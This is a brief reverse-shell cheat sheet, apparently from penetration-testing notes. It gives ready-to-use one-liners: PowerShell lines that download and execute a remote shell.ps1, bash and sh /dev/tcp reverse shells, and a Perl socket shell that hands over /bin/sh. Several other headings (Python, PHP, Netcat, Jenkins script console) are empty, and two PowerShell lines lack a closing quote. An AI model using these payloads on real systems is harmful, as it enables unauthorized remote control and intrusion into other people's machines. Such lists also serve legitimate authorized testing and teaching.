Reverse shell
Powershell
// Edit and host nishang Invoke-PowershellTcp
Powershell IEX(New-Object Net.WebClient).downloadString('http://10.10.14.32/shell.ps1)
// using powershell.exe os bit architecture
C:\Windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX(New-Object Net.WebClient).downloadString('http://10.10.14.32/shell.ps1)
Bash/Shell
# bash
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
# /bin/bash
/bin/bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
# sh
sh -i >& /dev/tcp/10.0.0.1/8080 0>&1Perl
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' Python
PHP
Ruby
Netcat / Netcat without -e
Java
JENKINS Script Console
Jenkins > Manage Jenkins > script console
Nishang Powershell
Last updated
Was this helpful?